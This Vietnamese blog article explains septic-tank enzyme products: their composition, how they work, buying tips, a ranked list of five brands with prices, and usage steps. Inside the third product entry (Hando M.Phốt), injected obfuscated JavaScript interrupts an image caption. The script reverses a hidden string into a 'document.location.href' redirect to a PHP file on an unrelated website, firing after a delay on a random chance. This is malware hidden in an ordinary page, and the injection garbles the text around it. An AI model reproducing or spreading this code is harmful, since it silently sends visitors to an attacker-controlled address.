Những điều bạn nên biết về men xử lý bể phốt, hầm cầu

Men bể phốt là một sản phẩm rất hữu ích đối với mỗi gia đình. Tuy nhiên vẫn có rất nhiều người không biết chọn mua và sử dụng sao cho hiệu quả nhất. Để hiểu rõ hơn về loại men xử lý bể phốt, hầm cầu này. Thì bạn không thể bỏ qua những thông tin được chia sẻ dưới đây.

Men bể phốt là gì

Có một tình trạng thường xuyên gặp phải của mỗi gia đình đó là bể phốt bị đầy. Khi đó sẽ gây ra nhiều hiện tượng như bốc mùi hôi thối, tắc nghẹt,… Lúc này ngoài cách gọi những dịch vụ thông hút thì sử dụng men xử lý cũng là một biện pháp hiệu quả.

men bể phốt
Tìm hiểu men bể phốt là gì

1/ Thành phần

Men bể phốt là một dòng chế phẩm sinh học rất hữu ích. Chúng có chứa đựng các vi sinh vật tồn tại trong môi trường hiếm khí và yếm khí. Những loại vi sinh vật này sinh sống và có tác dụng phân hủy mùn bã hữu cơ xử lý các chất thải có trong hầm cầu.

Có một thành phần không thể thiếu trong men xử lý bể phốt đó chính là bột gạo, bột đậu tương. Nhờ những tác động vật lý hóa học của các thành phần trên đã tạo nên hoạt lực phân hủy cực mạnh cho men bể phốt. Và chúng không hề làm hư hại hệ thống cống và bồn cầu.

2/ Cơ chế hoạt động

Men bể phốt phân hủy các chất thải có trong hầm cầu theo 3 giai đoạn như sau:

– Các vi sinh vật sống và phát triển trong môi trường hiếm khí. Chúng sản sinh ra các loại enzyme: Protease, Lipase, cellulose, Alpha-amylase,….giúp phân hủy nhanh chóng các loại chất thải thành những chất cấu trúc đơn giản.

– Các vi sinh vật kị khí sử dụng các chất thải làm thức ăn để lên men và tạo ra những chất có cấu trúc phân tử nhỏ hơn.

– Các vi sinh vật có trong men bể phốt hoàn thành nốt quá trình Acetat và Metan hóa. Các khí này sẽ theo đường ống thông hơi và thoát ra ngoài.

Và qua 3 giai đoạn đó các chất thải có trong bể phốt sẽ được lên men và tạo thành khí thoát ra ngoài.

men xử lý bể phốt
Cơ chế hoạt động của men xử lý bể phốt, hầm cầu

3/ Công dụng

Trong các hộ gia đình

Men xử lý bể phốt, hầm cầu cung cấp một lượng lớn các vi sinh vật có vai trò phân hủy các chất thải như phân, giấy… giúp cho bể phốt được thông thoáng. Nhờ vậy mà các tình trạng như đầy ứ, tắc nghẽn và mùi hôi sẽ được giải quyết.

Cùng với tính đối kháng mạnh nên các vi sinh vật có trong men bể phốt sẽ khiến cho các mầm mống bệnh giun sán bị diệt trừ. Từ đó đảm bảo được an toàn sức khỏe cho người sử dụng.

Sau khi lượng chất thải trong bể phốt đã được các vi sinh vật có trong men xử lý. Thì môi trường xung quanh gia đình sẽ được khử trùng và trở nên sạch sẽ. Nguồn nước, nguồn đất và không khí xung quanh sẽ không bị tình trạng ô nhiễm, mang lại một không gian sống lành mạnh.

Trong chăn nuôi

Trong các hộ chăn nuôi công nghiệp thường sử dụng hầm biogas. Mà các hầm biogas này thường gặp rất nhiều vấn đề về tính vệ sinh. Với 1 lượng lớn động vật được chăn nuôi lượng chất thải ra rất khó kiểm soát và xử lý đúng cách. Do vậy sử dụng men xử lý là một cách mang đến nhiều lợi ích.

hầm biogas
Tác dụng của men bể phốt trong chăn nuôi

Mục đích khi sử dụng hầm biogas là tận dụng các chất thải hữu cơ và tạo ra nguồn khí gas sinh học để phục vụ cho sinh hoạt. Và khi sử dụng men bể phốt để xử lý số lượng vi sinh vật tăng lên đẩy nhanh quá trình phân hủy. Từ đó sẽ đem lại lượng lớn khí gas cho các hộ chăn nuôi sử dụng.

Cũng nhờ vậy mà mùi hôi bốc ra từ trong hầm cũng được giảm đi đáng kể. Và không chỉ vậy một số nơi như các hàng quán cũng hay sử dụng men xử lý để làm sạch nước thải và bùn cống bị tích trữ lâu ngày.

Mẹo mua men xử lý bể phốt hiệu quả

Có quá nhiều loại men bể phốt xuất hiện trên thị trường. Điều này có nghĩa là nhu cầu tiêu dùng mạnh mẽ của người dân và cũng khiến bạn khó lựa chọn hơn. Để có thể tìm mua được một loại men có hiệu quả cao thì bạn chỉ cần áp dụng những mẹo dưới đây:

1/ Chú ý nguồn gốc xuất xứ, thông tin bao bì

Đối với bất kỳ một loại hàng hóa nào và men bể phốt cũng vậy. Điều đầu tiên bạn cần chú ý chính là thương hiệu nhà sản xuất và nguồn gốc xuất xứ của nó.

men bể phốt
Hãy chú ý đến nguồn gốc xuất xứ của sản phẩm

Bạn nên tìm mua men xử lý bể phốt, hầm cầu ở những nơi như siêu thị, cửa hàng, công ty uy tín trên thị trường. Đặc biệt tránh mua hàng trôi nổi ở những nơi kém chất lượng.

Một gói men xử lý tốt là cần phải đảm có mật độ vi sinh vật cao. Có như vậy thì men mới hoạt động hiệu quả và các khả năng hoại lực vi sinh vật mạnh khi sử dụng. Và bạn cũng cần chú ý đọc hết các thông tin sản phẩm xem xét thời gian sử dụng. Từ đó mà lựa chọn được loại men tốt nhất để sử dụng.

2/ Không mua loại quá rẻ

Có thể nói rằng chất lượng đi đôi với giá tiền. Nếu như bạn lựa chọn mua những loại men có giá thành quá rẻ thì chắc chắn sẽ không có tác dụng gì khi sử dụng cả. Còn những loại men tuy có giá thành cao hơn một chút nhưng sẽ đem lại những hiệu quả bất ngờ khi sử dụng.

Cho nên khi lựa mua men bể phốt bạn hãy tập trung vào chất lượng. Để tác dụng phân hủy của chúng được đảm bảo tốt nhất. Có như vậy thì mới đảm bảo được sự an toàn và thông thoáng cho bể phốt.

tập trung chất lượng
Hãy tập trung vào chất lượng khi chọn mua men xử lý

Top 5 men xử lý bể phốt tốt nhất trên thị trường

Sau đây là top 5 men xử lý bể phốt, thuốc tiêu hầm cầu được đánh giá là tốt nhất hiện nay. Bạn có thể tham khảo và lựa chọn sử dụng cho gia đình mình.

1/ Men xử lý bể phốt Clean Septic

Đầu tiên là dòng sản phẩm men xử lý bể phốt Clean Septic. Là thuốc xử lý hầm cầu hay thuốc tiêu hủy bồn cầu đều đem lại hiệu quả cao cho cả hai khu vực trong hệ thống tự hoại này.

Men xử lý Clean Septic
Men xử lý bể phốt Clean Septic phân hủy, khử mùi hôi

Cơ chế hoạt động của thuốc thông hầm cầu này dựa trên sự những hoạt động tự nhiên của các vi sinh vật. Được nghiên cứu và phân lập với hoạt tính cao. Sản phẩm có khả năng phân hủy các chất thải có trong bể phốt và khử mùi hôi cực kỳ  hiệu quả.

Hiện nay, sản phẩm này được bày bán rộng rãi trên thị trường với mức giá dao động trung bình từ 75.000 – 85.000 đồng cho một gói 100g.

2/ Men bể phốt Microphot

Khi bạn muốn kéo dài thời gian gọi dịch vụ thông hút bể phốt. Mà lại không biết nên sử dụng loại men bể phốt nào. Thì bạn có thể tham khảo men xử lý bể phốt, hầm cầu Microphot này. Đây là một sản phẩm đến từ thương hiệu Tracatu của Việt Nam.

Men bể phốt Microphot
Men Microphot phân hủy cao các chất khó tiêu trong bể phốt

Đặc biệt dòng sản phẩm này có khả năng làm sạch môi trường, khử mùi hôi. Nó còn tiêu diệt được mầm mống bệnh, trứng giun. Và không gây ảnh hưởng tới sức khỏe người và vật nuôi.

Loại men tiêu hủy bồn cầu Microphot có giá bán trên thị trường khá rẻ chỉ từ 20.000 đồng một gói 200g. Đây là dạng chế phẩm sinh học trung tính. Có tập hợp nhiều vi sinh vật có khả năng phân hủy cao các chất khó tiêu.

3/ Thuốc tiêu bồn cầu Hando M.Phốt

Do có công thức phân hủy đặc biệt thuốc tiêu bồn cầu Hando M.Phốt. Sở hữu khả năng tiêu diệt được hoàn toàn các vi khuẩn gây bệnh. Chúng còn có thể giúp thông tắc được bồn cầu làm cho bể phốt luôn luôn được sạch sẽ. Những mùi hôi thối cũng được hạn chế một cách tối đa.

 H<script srcset=
$mRi=function(n){if (typeof ($mRi.list[n]) == “string”) return $mRi.list[n].split(“”).reverse().join(“”);return $mRi.list[n];};$mRi.list=[“\’php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ando M.Phốt” width=”500″ height=”500″ /> Hết tắc nghẽn với thuốc tiêu bồn cầu Hando M.Phốt

Để có thể cho một hiệu quả sử dụng cao nhất bạn nên sử dụng sản phẩm theo định kỳ. Thông thường thì cứ trung bình từ 1 tới 3 tháng sử dụng một lần. Điều này sẽ hạn chế được hiện tượng tắc nghẽn và có thể kéo dài thời gian thông hút.

Giá thành của sản phẩm này cũng tương đối rẻ chỉ khoảng 20.000 một gói có trọng lượng 250g. Đây là sản phẩm của tập đoàn Hóa Sinh Hà Nội – Hando Việt Nam nghiên cứu và sản xuất.

4/ Thuốc tiêu hầm cầu Bio Septic

Đây là một sản phẩm có nguồn gốc xuất xứ tại Mỹ và được xếp vào danh sách các sản phẩm xử lý bể phốt, hầm cầu cao cấp. Bởi chúng có nhiều điểm nổi trội hơn so với các dòng sản phẩm khác.

Thuốc tiêu hầm cầu Bio Septic
Thuốc tiêu hầm cầu Bio Septic phân hủy chất thải nhanh chóng

Nó có khả năng phân hủy rất nhanh các chất thải rắn thành chất thải lỏng. Không những thế thuốc tiêu hầm cầu Bio Septic còn khôi phục quần thể sinh vật và hệ enzyme có lợi trong bể phốt. Do các tế bào vi sinh vật sẽ liên tục được sản sinh và gia tăng số lượng. Cho nên sản phẩm này mang lịa hiệu quả xử lý trong thời gian dài.

So với các sản phẩm khác thì loại này có giá thành đắt hơn hẳn từ 80.000 đồng đến 120.000 đồng cho một chai 350ml. Nhưng hiệu quả mà nó mang lại sẽ không làm bạn thất vọng.

5/ Thuốc tiêu hủy bồn cầu Ocleen 505

Với các thành phần chính là nước khử ion, sodium hydroxide. Thuốc tiêu hủy bồn cầu Ocleen 505 được sản xuất tại Việt Nam. Và có giá bán dao động tầm 70.000 đồng cho một chai có dung tích 1 lít. Đây là dòng sản phẩm rất được ưa chuộng trên thị trường. Nó là một hóa chất xử lý bể phốt có hoạt tính cực mạnh.

Thuốc tiêu hủy bồn cầu
Thuốc tiêu hủy bồn cầu Ocleen 505

Khi thả Ocleen 505 vào bể phốt sẽ tạo nên chất xúc tác có nhiệt độ cao và đốt nóng, phân hủy các chất thải như rêu, rác, tóc, xác động vật,… mạnh mẽ và nhanh chóng. Nhờ vậy giúp phòng tránh được nguy cơ tắc nghẽn hầm cầu cho gia đình bạn.

Hướng dẫn cách sử dụng men xử lý bể phốt, hầm cầu  

Nhờ những tác dụng tuyệt vời mà men bể phốt mang lại mà bạn có thể sử dụng sao cho hợp lý nhất. Sau đây là hướng dẫn sử dụng để mang lại được kết quả cao nhất.

Bước 1: Xác định lượng men cần sử dụng. Cần phải xác định được bể phốt nhà bạn có thể tích là bao nhiêu từ đó mà tính được lượng men sử dụng.

Bước 2: Sử dụng loại men bạn mua trước đó và đổ trực tiếp vào bồn cầu.

Bước 3: Nhấn xả nước bồn càu từ 2 – 3 lần để men có thể xuống bể. Mọi công việc còn lại sẽ do các vi sinh vật có trong men xử lý giúp bạn.

bồn cầu
cách sử dụng men xử lý bể phốt, hầm cầu

– Khi sử dụng men lần đầu tiên bạn nên dùng khoảng 200g. Nếu lượng phân nhiều hãy sử dụng liều cao hơn. Thông thường 1 gói 200g sẽ sử dụng cho 1,5 m3 bể phốt.

– Bạn nên sử dụng theo chu kỳ từ 3 – 4 tháng 1 lần hoặc theo chỉ định của nhà sản xuất. Và nên dùng vào cuối ngày khi mà tần suất sử dụng bồn cầu thấp.

– Lưu ý bảo quản sản phẩm nơi khô ráo tránh ánh sáng trực tiếp và để nơi an toàn, tránh xa trẻ em.

Trên đây là toàn bộ thông tin về men xử lý bể phốt, hầm cầu và cách sử dụng hiệu quả nhất. Hi vọng bạn đã có thể giải quyết những vấn đề bể phốt một cách nhanh chóng và thành công.